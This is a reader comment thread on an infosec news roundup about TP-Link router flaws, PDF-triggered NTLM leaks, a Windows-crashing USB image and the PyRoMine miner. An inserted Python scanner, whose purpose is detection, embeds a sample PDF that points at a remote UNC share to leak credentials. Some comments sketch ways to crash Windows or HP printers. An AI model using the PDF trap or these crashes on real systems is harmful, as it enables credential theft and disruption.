Windows USB-stick-of-death, router bugs resurrected, and more

Here's your summary of infosec news – from router holes to Windows crashes – beyond what we've already covered this week. TPLink? More like TPwnedLink, amiright? Anyone? Tim Carrington at Fidus Infosec went public on Thursday with not-so-new remote-code execution flaws in TPLink router firmware. We're told the security holes ( …

  1. Anonymous Coward

    I am surprised at TP-LINK being vulnerable

    Since the last time I attempted to use one to do more than be a basic NAT ROUTER, not ONE of the software features worked as advertised. Or at all.

    To actually install malware in it deserves a medal.

    1. Sanctimonious Prick

      Re: I am surprised at TP-LINK being vulnerable

      You say "medal," I say "mental."

    2. Mark 65

      Re: I am surprised at TP-LINK being vulnerable

      I think the best direction these days is to look at dd-wrt, open-wrt, tomato, gargoyle etc.; decide which one you like; then look at the list of compatible hardware and choose your router from there. Vendor updates seem few and far between and only for the latest models. A decent router can last for many years - as I have little need for AC wireless my 802.11a/b/n router is still just as useful today as it was when I bought it 7 years ago - so it makes sense to go with open firmware and get timely openssl updates.

  2. arctic_haze

    It's 2018 and your NTLM credentials are broadcast by PDF files

    Actually, this is 100% a Windows bug, not a PDF one. The PDF file works as advertised. It is supposed to be able to embed remote documents (whatever that means), so it embeds them. The rest is Microsoft software.

    By the way, Microsoft claims that no mitigation or workaround exists. It is not true. All you need to do is to disable SMB. It may be impossible for many corporate users but I think the vast majority of Windows users should have done that long ago. I disabled SMB almost a year ago to protect myself from the WannaCry ransomware.

    1. Grikath

      Re: It's 2018 and your NTLM credentials are broadcast by PDF files

      actually ....nope.. It's Adobe..

      As per their answer in the article:

      "The issue was disclosed to Adobe which responded as shown below, without assigning any CVE or fix for the vulnerability:

      “Thank you for checking in on this case. Microsoft issued an optional security enhancement [0] late last year that provides customers with the ability to disable NTLM SSO authentication as a method for public resources. With this mitigation available to customers, we are not planning to make changes in Acrobat.“ "

      You can see that M$ has taken action ( however obscure, etc...). It is *Adobe* that says "this is sufficient mitigation" even though the problem itself has its root in the way a PDF document reads/executes remotely hosted inserts in a document without any fact-checking at all.

      1. Nick Ryan

        Re: It's 2018 and your NTLM credentials are broadcast by PDF files

        As much as I generally hate everything that Adobe deliver or the way they deliver it (or both), in this case it is squarely an Operating System issue. The OS is there to process and enforce links and such actions (hence especially annoying when Microsoft break this and force links to use shite such as Edge rather than the user's choice of better browser) are OS actions and therefore externally handled by the OS shell and supporting applications. Adobe (Acrobat) shouldn't need to know, or care, about every possible URI handler or supporting application - just that these can be passed to the OS to deal with. If these happen to include file:\\ links, therefore SMB, this is an OS issue and not Acrobat.
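The remote-document mechanism this sub-thread argues about, as an added defender's check that is not part of the article or of any comment: a scanner that flags PDF remote-GoTo actions whose /F file specification points at a UNC path or a URL, the kind of reference a Windows viewer hands to the OS and that can trigger an outbound SMB/NTLM authentication. It assumes the actions in question are /GoToR and /GoToE; the PDF fragment and the 203.0.113.9 host are constructed for the example.

```python
import re

# Constructed sample (not from the article): a minimal PDF whose OpenAction
# is a remote-GoTo action (/GoToR) with an /F file specification naming a
# UNC path. A Windows viewer passes that path to the OS, which may try to
# authenticate to the named host over SMB/NTLM as soon as the file opens.
# Object 4 is a harmless relative reference, included as a negative case.
SAMPLE_PDF = rb"""%PDF-1.7
1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 3 0 R >> endobj
2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj
3 0 obj << /Type /Action /S /GoToR /F (\\\\203.0.113.9\\share\\leak.pdf) /D [0 /Fit] >> endobj
4 0 obj << /Type /Action /S /GoToR /F (appendix.pdf) /D [0 /Fit] >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

OBJ_RE = re.compile(rb"(\d+)\s+\d+\s+obj(.*?)endobj", re.DOTALL)
ACTION_RE = re.compile(rb"/S\s*/(GoToR|GoToE)\b")   # assumed action types
# Literal string following /F; the alternation keeps escaped chars intact.
F_LITERAL_RE = re.compile(rb"/F\s*\(((?:\\.|[^\\)])*)\)", re.DOTALL)
PDF_ESCAPES = {b"n": b"\n", b"r": b"\r", b"t": b"\t",
               b"(": b"(", b")": b")", b"\\": b"\\"}

def decode_pdf_literal(raw: bytes) -> str:
    """Undo PDF literal-string escapes: \\\\ -> \\, \\( -> (, \\) -> ) and so on."""
    out, i = bytearray(), 0
    while i < len(raw):
        if raw[i:i + 1] == b"\\" and i + 1 < len(raw):
            nxt = raw[i + 1:i + 2]
            out += PDF_ESCAPES.get(nxt, nxt)
            i += 2
        else:
            out += raw[i:i + 1]
            i += 1
    return out.decode("latin-1")

def is_remote_path(path: str) -> bool:
    """True for a Windows UNC (\\\\host\\share), PDF portable UNC (//host/share) or a URL."""
    return path.startswith(("\\\\", "//")) or \
        re.match(r"[a-z][a-z0-9+.-]*://", path, re.I) is not None

def find_remote_actions(pdf: bytes):
    """Return (object number, action type, decoded path) for each remote-GoTo
    action whose /F target leaves the local machine."""
    findings = []
    for m in OBJ_RE.finditer(pdf):
        num, body = int(m.group(1)), m.group(2)
        act = ACTION_RE.search(body)
        if not act:
            continue
        for f in F_LITERAL_RE.finditer(body):
            path = decode_pdf_literal(f.group(1))
            if is_remote_path(path):
                findings.append((num, act.group(1).decode(), path))
    return findings

if __name__ == "__main__":
    for num, kind, path in find_remote_actions(SAMPLE_PDF):
        print(f"object {num}: /{kind} action targets remote path {path!r}")
```

Hex strings and file-specification dictionaries (/FS /URL) are not parsed here; a production scanner should decode object streams and cover those forms too.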

  3. Stoneshop

    Oh, that's one I recognise

    "Bitdefender bloke Marius Tivadar has developed a dodgy NTFS file system image that crashes at least Windows 7 and 10 systems: popping it on a USB stick and then plugging that into a vulnerable computer will cause it to fall over with a blue-screen-of-death when a mount attempt is made. "

    W7 also keels over when you offer it an ODS-2 formatted stick. I see a need to check if W10 has the same flaw.

    1. Anonymous Coward

      Re: Oh, that's one I recognise

      Also, take a raspbian RPI3 image written to a USB disk and delete the single FAT32 partition; Windows goes pop when it tries to mount 20+ unrecognisable partitions.

      Crashes Win7 and Win10

      Windows really is garbage.

      1. ds6

        Re: Oh, that's one I recognise

        And yet, by wasting all of their money on advertising, hardware deals, corporate contracts, and monopolizing the market, Microsoft has made Windows the #1 option for end users, even into the far reaches of world governments.

        When will this insanity end?

        1. Richard Jukes

          Re: Oh, that's one I recognise

          I guess when someone finally releases a decent Office suite for Linux that actually does what is required? Without hours of faffing around obscure menus and settings?

          Oh and also when all of the custom programs a company requires are compiled and supported in a linux environment....

          If it were not for the lack of a decent office suite and support for our Hire Software I would already be using linux...

          1. ds6

            Re: Oh, that's one I recognise

            With the heavy push to Office 365 you already have full access to a browser-based suite. Or just run 2003 in Wine, also known as the least garbage edition. Personal preference aside, 2010 runs just fine too—I installed it for my parents on their GalliumOS Chromebooks. I would assume you don't like LibreOffice based on your comment, but it really does work pretty well. I have used it professionally in place of MS Office; it did miss a scant few features that I never had a need for when I used it quite a while ago, so maybe it's come farther since then.

            Will your awful proprietary software not run in Wine or a VM?

            1. Alan Brown

              Re: Oh, that's one I recognise

              " it did miss a scant few features that I never had a need for when I used it quite a while ago"

              As did Microsoft word back in the days when it took over the market from the plethora of expensive competitors that were around then.

              That's why things like Libreoffice terrify them. "Good enough" was good enough to allow them to take over and "Good enough" is good enough to allow someone else to whip the rug out from under their feet.

              1. Dave Bell

                Re: Oh, that's one I recognise

                One of the problems is that there are a few things that MS Word did which have become standard in places such as the publishing industry, and the alternatives struggle with them. It's mostly centred on change-tracking on a document in the editing process. You can produce a compatible file to submit to the publisher, but there's a lot that has to be done to that version, both the obvious area of spelling errors and more complicated fine-tuning of the flow and pacing and storytelling.

                It's different enough a process from ordinary office work that it doesn't surprise me. It also means that some Word bugs in the area can now be regarded as features that have to be emulated.

            2. Anonymous Coward

              Re: Oh, that's one I recognise

              "With the heavy push to Office 365 you already have full access to a browser-based suite. "

              But why would you when almost all O365 options allow you to install a local fully featured office version that will still work without internet?

      2. Sanctimonious Prick

        Re: Oh, that's one I recognise

        I dunno... I use 8.1 on a desktop machine, and it so far hasn't had a problem.

      3. Waseem Alkurdi

        Re: Oh, that's one I recognise

        Isn't that because of the DOS history picked up by NT?

        Hell, even a USB stick with 2+ partitions can't have its other partitions mounted.

    2. Dave Bell

      Re: Oh, that's one I recognise

      It looks as though Microsoft are splitting hairs over fixing it, saying that because it needs "social engineering" it isn't a software security problem.

      A flawed filesystem on a USB stick shouldn't cause a blue-screen-of-death, however it gets attached.

      If Department A at MS say it isn't a problem they deal with, and say they have passed the report on to Department B, who do handle those problems, that's OK. Telling you to submit it to Department B might not be the best answer, but it isn't bad.

      1. Orv

        Re: Oh, that's one I recognise

        I wouldn't see it as a high priority if I were them, either, unless there's some kind of code execution vulnerability involved. If you've got physical access to the machine you have lots of other ways of crashing it.

  4. Doctor Syntax

    A worth-while moratorium?

    Rather than the moratorium ICAN'T keeps asking for how about one on new features? Spend a development cycle or two just fixing bugs in existing features.

  5. Anonymous Coward

    Simple fix for the US Military's software problems. All they have to do is move to OpenBSD.

    1. Anonymous Coward

      And what about all the Windows-ONLY software out there? Particularly the stuff that runs custom hardware and therefore can't be virtualized?

      1. ds6

        Hardware passthrough works flawlessly in my experience with PCI devices for most modern setups, including FreeBSD bhyve, Xen with NetBSD dom0, and QEMU on OpenBSD. Alternative board-specific options such as UART, GPIO, serial, and other methods could probably be hacked together quickly enough, if it isn't already possible—I have no experience with this, however. If it's some stupid proprietary solution that doesn't feed through PCI and doesn't use any pre-existing common technology... Take the one who made that mistake aside and get hit a little.

        Additionally, it is entirely the problem that software vendors ship closed-source, buggy, non-portable proprietary code that won't work on anything but a specific version of Windows Vista. Deciding not to use Windows in the workforce—even if it will cause some headache—helps increase the visibility and viability of alternative systems that otherwise would not even be considered and, if you opt for an open-source solution, you can modify your system to better suit the needs of your business. But that's just my uninformed opinion.

        1. Alan Brown

          "software vendors ship closed-source, buggy, non-portable proprietary code that won't work on anything but a specific version of Windows Vista."

          I have hardware (spectrum analysers, etc) running embedded versions of W95. They aren't going anywhere near the network for obvious reasons but I've also seen w2k in less-than-10-year-old MRI installations, etc.

          The hardware vendor's solution is "buy new hardware" (In the latter case that's a few million dollars a pop)

      2. Anonymous Coward

        Do you really think that if the Pentagon went all BSDs and Linux or let's say OpenBSD, others can also apply here, that with 3/4s of a trillion dollar budget (OK, $700 billion, damn near though) that suppliers wouldn't rewrite or write new software? The problem is that all those Officers in Procurement want a nice job with MS and suppliers of software that runs on Windows after they've retired and or for their children. Most OSS can't compete with that. Same for all other Government Procurements Departments. Same applies to hardware.

        PS

        All hardware drivers should be open source.

        https://www.cnn.com/2018/03/28/politics/us-military-spending-items-intl/index.html

        1. Anonymous Coward

          NO, because patents get in the way. True, actual hardware patents that companies fiercely protect. Not even the military can get around proprietary patents. Remember, ONLY things developed BY the government are ineligible for copyright or patent protection. Things made FOR the government BY an outside private firm are another story.

          Plus there's the matter of sweetheart deals to particular congressional districts that are begging for federal money for their continued survival. So unless you're willing to kill people and communities in order to balance the budget...

          1. Alan Brown

            "Actual hardware patents that companies fiercely protect. Not even the military can get around proprietary patents"

            Actually they can. Eminent domain and all that. Look it up.

            In any case, they don't need to. All the big customers need to do is specify in $BIG_CONTRACT that "This shall work on XYZ operating system and remain fully supported for ABC years".

            That's why you can still buy VMS for a few more years yet.

            1. Charles 9

              "Actually they can. Eminent domain and all that. Look it up."

              I have. That only applies to realty, and ONLY if there's a compelling government interest in it. Otherwise, the property owner can sue on those grounds and force a change to the conditions. I don't recall eminent domain being used on a patent or a copyright.

              "In any case, they don't need to. All the big customers need to do is specify in $BIG_CONTRACT that "This shall work on XYZ operating system and remain fully supported for ABC years"."

              Until they get back: "Offers: None at any price." Not even lucrative contracts will mean much if the potential buyer doesn't see a good enough return in the offing due to hidden costs or legal risks.

            2. Anonymous Coward

              you can still buy VMS for a few more years yet.

              "you can still buy VMS for a few more years yet."

              According to some folks, it's actually looking even better than it was a couple of years ago [0].

              The word on the streets as of a few days ago is that OpenVMS [1] development *and support* has left the HP[E] building, for a new home where VMS-related business has already been welcomed rather than treated like an unwanted nuisance. Itanium got the high end money and attention courtesy of HP, but OpenVMS looks likely to ultimately last longer than Itanium. As for Autonomy... thanks HP execs, you bunch of absolute numpties.

              VMS on VAX is mature, the future of VMS on Alpha systems looks better than it was a couple of years ago, anyone who cares about VMS on Itanium has other bigger issues to address, and VMS on some other more familiar hardware is on the way.

              [0] https://www.theregister.co.uk/2016/10/13/openvms_moves_slowly_towards_x86/

              [1] The Open in OpenVMS is preferably silent and preferably unwritten, but occasionally serves to help search engine users etc distinguish VMS the operating system from VMs (as in the plural of virtual machine).

          2. Orv

            A lot of the rationale for going with Windows was that it would save the military money, since they'd be using more off-the-shelf stuff instead of custom. It hasn't necessarily worked out that way, but if they dump Windows I suspect they'll go back to their own bespoke OS's instead of moving to OpenBSD or something like that.

          3. Doctor Syntax

            "So unless you're willing to kill people"

            I thought we were talking about the Pentagon. Where's their problem in that?

  6. JassMan

    It's only a couple of days since the NSA was trying to foist backdoors upon the world

    PyRoMine fires up EternalBlue flaw to forge Monero

    "What's worse, the code spreads itself using the infamous EternalBlue and EternalRomance NSA-developed exploits."

    On the 25th April we were told that the NSA had produced "Simon" and "Speck" cryptographic tools which were designed to secure data to and from the next generation of internet-of-things gizmos and sensors, and were intended to become a global standard.

    Thank god ISO stopped them in their tracks. It sounds like the NSA are a greater danger to world security than all other malware writers combined.

    1. Anonymous Coward

      Re: It's only a couple of days since the NSA was trying to foist backdoors upon the world

      Including all the other governments?

  7. Destroy All Monsters

    Muh stack, muh dry stack!!

    The stack-overflow bugs can be exploited via the built-in HTTP web server

    These are bugs copy-pasted from StackOverflow, right?

    Oh, wait, these are actually buffer-overflow bugs. Should I say ACTUALLY buffer-overflow bugs?

    Hey... wait. It's 2018? Not, like, 1988?

    Inability to learn, inability to code. Inability to use modern tools.

    Why doesn't this "Industry" just kill itself to get it over with?

    1. Anonymous Coward

      'These are bugs copy-pasted from StackOverflow, right?'

      Probably, some badly written and little supported open source libraries lifted from GitHub... which doesn't mean the original developer didn't get some code from StackOverflow....

    2. Alan Brown

      Re: Muh stack, muh dry stack!!

      "Hey... wait. It's 2018? Not, like, 1988?"

      Send postscript to any HP printer with headers longer than 1024 bytes (the standard allows for 4096 bytes).

      Watch the resulting mess with glee.

      I told HP about this in 2003. They promised to fix it in 2004. We use PS for printing (most *nix houses do). Guess who's on the naughty step?

      1. Alistair

        Re: Muh stack, muh dry stack!!

        We use PS for printing (most *nix houses do). Guess who's on the naughty step?

        Headers, yeah. And data streaming a billing run to a windows print server queue on W2K3 or W2K8.

        "What Print Server? There was a print server here?"

    3. Waseem Alkurdi

      Re: Muh stack, muh dry stack!!

      Continuing on the pun, stack-overflow != Stack Overflow, because (proper) programming languages are case-sensitive, and don't forget the whitespace xD

    4. Orv

      Re: Muh stack, muh dry stack!!

      This sounds like my reaction when I found out the Nintendo Switch had been cracked with a stack-smashing buffer overflow attack on its GPU ROMs. Via a memcopy routine that accepted a length parameter from untrusted input, no less. Maybe current firmware coders have just forgotten what the software industry learned 30 years ago.

  8. BebopWeBop

    Forging?

    PyRoMine fires up EternalBlue flaw to forge Monero

    Another day, another pack of criminals finding new and creative ways to make a buck on cryptocoins.

    Well technically (maybe) creative, but are they strictly forging Monero?

    1. Anonymous Coward

      Re: Forging?

      "Well technically (maybe) creative, but are they strictly forging Monero?"

      The word "forge" unfortunately has three distinct meanings; to make (from fabricare, Latin to make), to make a false copy, and to make rapid progress (forge ahead).

      They are forging Monero in the first sense, and perhaps in the third.

  9. Wensleydale Cheese

    "Hahad" - a wonderful name for a security bod

    "Sounds scary, but as Mounir Hahad of Juniper Threat Labs told El Reg, both flaws have long-since been patched by Microsoft."

    Ha!-Had!. or Haha'd, take your pick :-)
